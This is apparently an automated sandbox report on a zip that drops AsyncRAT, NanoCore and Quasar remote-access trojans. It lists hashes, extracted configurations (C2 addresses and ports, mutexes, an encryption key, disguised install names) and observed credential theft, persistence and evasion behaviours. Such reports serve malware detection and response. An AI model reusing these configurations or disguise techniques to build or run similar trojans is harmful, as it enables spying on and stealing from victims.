asyncrat | 8cf526249781356054ba9931a1d42662a20c2ed0818a91b287e7ef3b2ad745f2

Analysis

max time kernel
518s
max time network
527s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
05-02-2025 06:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

topg6565767677.zip
Size

163.6MB
MD5

aa8e2a005795238df5b57e41d1b9e70f
SHA1

573a4181a155282abc73fbbc8a1f4d462c7f6a2a
SHA256

8cf526249781356054ba9931a1d42662a20c2ed0818a91b287e7ef3b2ad745f2
SHA512

8fd87b6671165b2a74dafefe1be74daaea78543e5dd48dff41d8375e6a910e60188a9cec2447d16c6dd1c9f2ee2b58578ea5332abbb506b4ade38db21da40a25
SSDEEP

3145728:pb2HFRD9Ydt+3ZZdCZuvXJFUd2Uj3b2VLQJ5Gh3nqXOEaRjhz4GwnjS:RSfD9Kt+3zdAa5FUd2Or6LQJ563nqXtI

Score

10^/10

asyncrat nanocore quasar default office04 runtime collection credential_access defense_evasion discovery execution keylogger persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

192.168.109.165:54984

Mutex

a3eb1197-9800-468e-8c68-c490bebecbd2

Attributes

activate_away_mode
true
backup_connection_host
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-11-09T10:18:36.073318936Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
54984
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
a3eb1197-9800-468e-8c68-c490bebecbd2
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
192.168.109.165
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

157.97.11.134:9119

Mutex

4223e665-4744-441c-908d-048c84ca5afb

Attributes

encryption_key
5226F9AC7402A7AB56E886D66B6CF09EDC22E0A0
install_name
googlee.exe
log_directory
Logs
reconnect_delay
3000
startup_key
google
subdirectory
google

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

157.97.11.134:8080

Mutex

Runtime Broker

Attributes

delay
1
install
false
install_file
Runtime Broker.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Runtime

157.97.11.134:8080

Mutex

Runtime Broker

Attributes

delay
1
install
true
install_file
Runtime Broker.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/1364-51-0x0000000000270000-0x0000000000594000-memory.dmp	family_quasar
behavioral1/files/0x001900000002aee3-54.dat	family_quasar

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002aee8-65.dat	family_asyncrat
behavioral1/files/0x0005000000025017-204.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1380	powershell.exe
4088	powershell.exe
4292	powershell.exe
496	powershell.exe
5580	powershell.exe
3632	powershell.exe
5260	powershell.exe
1380	powershell.exe
5640	powershell.exe
3300	powershell.exe
4916	powershell.exe
4080	powershell.exe
244	powershell.exe
2072	powershell.exe
5580	powershell.exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2868	cmd.exe
1876	powershell.exe
1500	cmd.exe
3380	powershell.exe
5608	cmd.exe
4464	powershell.exe

Executes dropped EXE 58 IoCs

pid	Process
3732	googlee.exe
3424	Runtime Broker.exe
2892	Google Chrome.exe
1388	image2.exe
400	Runtime.exe
2648	tv.exe
1212	Runtime Broker1.exe
3680	Runtime Broker.exe
3332	runexehelper.exe
936	runexehelper.exe
6108	Google Chromee.exe
2800	Google Chromee.exe
1624	rar.exe
5448	K1NG_Spoffer.exe
2432	Google Chrome.exe
3136	Runtime Broker.exe
3144	Runhelper.exe
3296	Runtime Broker.exe
928	RuntimeBroker.exe
5388	Runtime Broker.exe
5024	runexehelper.exe
4212	runexehelper.exe
1656	runexehelper.exe
5016	runexehelper.exe
5480	Google Chromee.exe
4688	Google Chromee.exe
5604	Runtime Broker.exe
1760	rar.exe
3376	spoffer.exe
3596	RunAsHelper.exe
1264	svchost.exe
4464	spoffer_update.exe
5272	runexehelper.exe
5716	runexehelper.exe
4200	rar.exe
5460	svchost.exe
1944	RunAsHelper.exe
3580	svchost.exe
928	svchost.exe
224	svchost.exe
3596	svchost.exe
2652	svchost.exe
5516	svchost.exe
3760	svchost.exe
5556	svchost.exe
3564	svchost.exe
5684	svchost.exe
4852	svchost.exe
4876	svchost.exe
5100	svchost.exe
5508	svchost.exe
752	svchost.exe
3692	svchost.exe
412	svchost.exe
940	svchost.exe
5944	K1NG_Spoffer.exe
1472	Google Chrome.exe
3504	svchost.exe

Loads dropped DLL 64 IoCs

pid	Process
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
936	runexehelper.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
2800	Google Chromee.exe
5412	MsiExec.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
4212	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe
5016	runexehelper.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5480	ICACLS.EXE
1628	ICACLS.EXE

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	discord.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	Google Chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	Runtime.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	Google Chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	Runhelper.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Host = "C:\\Program Files (x86)\\WAN Host\\wanhost.exe"	Google Chrome.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Google Chrome.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Runtime.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Google Chrome.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Runhelper.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Google Chrome.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 33 IoCs

Web Service

T1102

flow	ioc
170	raw.githubusercontent.com
184	raw.githubusercontent.com
191	raw.githubusercontent.com
13	raw.githubusercontent.com
172	raw.githubusercontent.com
199	raw.githubusercontent.com
200	raw.githubusercontent.com
227	raw.githubusercontent.com
27	raw.githubusercontent.com
163	raw.githubusercontent.com
204	raw.githubusercontent.com
207	raw.githubusercontent.com
214	raw.githubusercontent.com
11	discord.com
34	discord.com
168	discord.com
230	raw.githubusercontent.com
234	raw.githubusercontent.com
11	raw.githubusercontent.com
150	raw.githubusercontent.com
177	raw.githubusercontent.com
182	raw.githubusercontent.com
224	raw.githubusercontent.com
133	discord.com
180	raw.githubusercontent.com
209	raw.githubusercontent.com
216	raw.githubusercontent.com
218	raw.githubusercontent.com
146	raw.githubusercontent.com
188	raw.githubusercontent.com
211	raw.githubusercontent.com
88	raw.githubusercontent.com
47	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
11	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 9 IoCs

discovery

Process Discovery

T1057

pid	Process
2592	tasklist.exe
2076	tasklist.exe
3016	tasklist.exe
5860	tasklist.exe
5680	tasklist.exe
1580	tasklist.exe
3644	tasklist.exe
4748	tasklist.exe
5696	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3376	spoffer.exe
3376	spoffer.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/936-242-0x00007FF8DC370000-0x00007FF8DC7D5000-memory.dmp	upx
behavioral1/memory/936-243-0x00007FF8FC4B0000-0x00007FF8FC4D4000-memory.dmp	upx
behavioral1/memory/936-244-0x00007FF8FD920000-0x00007FF8FD92F000-memory.dmp	upx
behavioral1/memory/936-249-0x00007FF8FC480000-0x00007FF8FC4AC000-memory.dmp	upx
behavioral1/memory/936-250-0x00007FF8FC460000-0x00007FF8FC478000-memory.dmp	upx
behavioral1/memory/936-251-0x00007FF8FC440000-0x00007FF8FC45E000-memory.dmp	upx
behavioral1/memory/936-252-0x00007FF8DDE70000-0x00007FF8DDFE1000-memory.dmp	upx
behavioral1/memory/936-253-0x00007FF8FC420000-0x00007FF8FC439000-memory.dmp	upx
behavioral1/memory/936-255-0x00007FF8FC3E0000-0x00007FF8FC40E000-memory.dmp	upx
behavioral1/memory/936-254-0x00007FF8FC410000-0x00007FF8FC41D000-memory.dmp	upx
behavioral1/memory/936-256-0x00007FF8DB100000-0x00007FF8DB477000-memory.dmp	upx
behavioral1/memory/936-257-0x00007FF8DDDB0000-0x00007FF8DDE67000-memory.dmp	upx
behavioral1/memory/936-259-0x00007FF8FC3C0000-0x00007FF8FC3D5000-memory.dmp	upx
behavioral1/memory/936-258-0x00007FF8DC370000-0x00007FF8DC7D5000-memory.dmp	upx
behavioral1/memory/936-261-0x00007FF8FC3B0000-0x00007FF8FC3BD000-memory.dmp	upx
behavioral1/memory/936-260-0x00007FF8FC4B0000-0x00007FF8FC4D4000-memory.dmp	upx
behavioral1/memory/936-264-0x00007FF8DC250000-0x00007FF8DC368000-memory.dmp	upx
behavioral1/memory/936-313-0x00007FF8FC480000-0x00007FF8FC4AC000-memory.dmp	upx
behavioral1/memory/936-330-0x00007FF8FC460000-0x00007FF8FC478000-memory.dmp	upx
behavioral1/memory/936-413-0x00007FF8FC440000-0x00007FF8FC45E000-memory.dmp	upx
behavioral1/memory/2800-414-0x00007FF8DAC90000-0x00007FF8DB0F5000-memory.dmp	upx
behavioral1/memory/936-423-0x00007FF8DDE70000-0x00007FF8DDFE1000-memory.dmp	upx
behavioral1/memory/936-428-0x00007FF8DB100000-0x00007FF8DB477000-memory.dmp	upx
behavioral1/memory/936-427-0x00007FF8FC3E0000-0x00007FF8FC40E000-memory.dmp	upx
behavioral1/memory/2800-426-0x00007FF8F30A0000-0x00007FF8F30AF000-memory.dmp	upx
behavioral1/memory/2800-425-0x00007FF8DDD80000-0x00007FF8DDDA4000-memory.dmp	upx
behavioral1/memory/936-424-0x00007FF8FC420000-0x00007FF8FC439000-memory.dmp	upx
behavioral1/memory/2800-436-0x00007FF8E87E0000-0x00007FF8E880C000-memory.dmp	upx
behavioral1/memory/936-435-0x00007FF8DDDB0000-0x00007FF8DDE67000-memory.dmp	upx
behavioral1/memory/2800-439-0x00007FF8DB820000-0x00007FF8DB991000-memory.dmp	upx
behavioral1/memory/2800-438-0x00007FF8F2D40000-0x00007FF8F2D5E000-memory.dmp	upx
behavioral1/memory/2800-437-0x00007FF8F30B0000-0x00007FF8F30C8000-memory.dmp	upx
behavioral1/memory/2800-449-0x00007FF8F3010000-0x00007FF8F301D000-memory.dmp	upx
behavioral1/memory/2800-448-0x00007FF8DC130000-0x00007FF8DC149000-memory.dmp	upx
behavioral1/memory/2800-454-0x00007FF8DBD80000-0x00007FF8DBE37000-memory.dmp	upx
behavioral1/memory/2800-452-0x00007FF8D7590000-0x00007FF8D7907000-memory.dmp	upx
behavioral1/memory/2800-471-0x00007FF8F30A0000-0x00007FF8F30AF000-memory.dmp	upx
behavioral1/memory/2800-484-0x00007FF8DAC90000-0x00007FF8DB0F5000-memory.dmp	upx
behavioral1/memory/2800-483-0x00007FF8DC100000-0x00007FF8DC12E000-memory.dmp	upx
behavioral1/memory/2800-482-0x00007FF8F3010000-0x00007FF8F301D000-memory.dmp	upx
behavioral1/memory/2800-481-0x00007FF8DBD60000-0x00007FF8DBD75000-memory.dmp	upx
behavioral1/memory/2800-480-0x00007FF8D7590000-0x00007FF8D7907000-memory.dmp	upx
behavioral1/memory/2800-479-0x00007FF8ECD00000-0x00007FF8ECD0D000-memory.dmp	upx
behavioral1/memory/2800-478-0x00007FF8DC130000-0x00007FF8DC149000-memory.dmp	upx
behavioral1/memory/2800-477-0x00007FF8DBD80000-0x00007FF8DBE37000-memory.dmp	upx
behavioral1/memory/2800-476-0x00007FF8F2D40000-0x00007FF8F2D5E000-memory.dmp	upx
behavioral1/memory/2800-475-0x00007FF8F30B0000-0x00007FF8F30C8000-memory.dmp	upx
behavioral1/memory/2800-474-0x00007FF8E87E0000-0x00007FF8E880C000-memory.dmp	upx
behavioral1/memory/2800-473-0x00007FF8DDD80000-0x00007FF8DDDA4000-memory.dmp	upx
behavioral1/memory/2800-472-0x00007FF8DB820000-0x00007FF8DB991000-memory.dmp	upx
behavioral1/memory/2800-456-0x00007FF8DBD60000-0x00007FF8DBD75000-memory.dmp	upx
behavioral1/memory/2800-455-0x00007FF8DDD80000-0x00007FF8DDDA4000-memory.dmp	upx
behavioral1/memory/2800-451-0x00007FF8DC100000-0x00007FF8DC12E000-memory.dmp	upx
behavioral1/memory/2800-450-0x00007FF8DAC90000-0x00007FF8DB0F5000-memory.dmp	upx
behavioral1/memory/936-511-0x00007FF8DC370000-0x00007FF8DC7D5000-memory.dmp	upx
behavioral1/memory/936-520-0x00007FF8FC3E0000-0x00007FF8FC40E000-memory.dmp	upx
behavioral1/memory/936-529-0x00007FF8DDDB0000-0x00007FF8DDE67000-memory.dmp	upx
behavioral1/memory/936-528-0x00007FF8DC250000-0x00007FF8DC368000-memory.dmp	upx
behavioral1/memory/936-527-0x00007FF8FC3B0000-0x00007FF8FC3BD000-memory.dmp	upx
behavioral1/memory/936-526-0x00007FF8FC3C0000-0x00007FF8FC3D5000-memory.dmp	upx
behavioral1/memory/936-519-0x00007FF8FC410000-0x00007FF8FC41D000-memory.dmp	upx
behavioral1/memory/936-518-0x00007FF8FC420000-0x00007FF8FC439000-memory.dmp	upx
behavioral1/memory/936-517-0x00007FF8DDE70000-0x00007FF8DDFE1000-memory.dmp	upx
behavioral1/memory/936-516-0x00007FF8FC440000-0x00007FF8FC45E000-memory.dmp	upx

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	discord.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	Runtime.exe
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	Runhelper.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	discord.exe
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	Runtime.exe
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	Runhelper.exe
File created	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe
File opened for modification	C:\Program Files (x86)\WAN Host\wanhost.exe	Google Chrome.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\SystemTemp\~DF17D51697E3C32D45.TMP	msiexec.exe
File created	C:\Windows\Installer\e5a8212.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5a8212.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI836A.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSI2914.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF3E3D55069AE3233F.TMP	msiexec.exe
File created	C:\Windows\Installer\SourceHash{4F5477E7-AF36-4F5A-8A7E-4FCE329329AA}	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2867.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFBC00317BA903F2BF.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF2795F12FB10C5101.TMP	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSI2877.tmp	msiexec.exe
File created	C:\Windows\Installer\e5a8214.msi	msiexec.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3596	RunAsHelper.exe
1944	RunAsHelper.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RunAsHelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RunAsHelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Google Chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ICACLS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
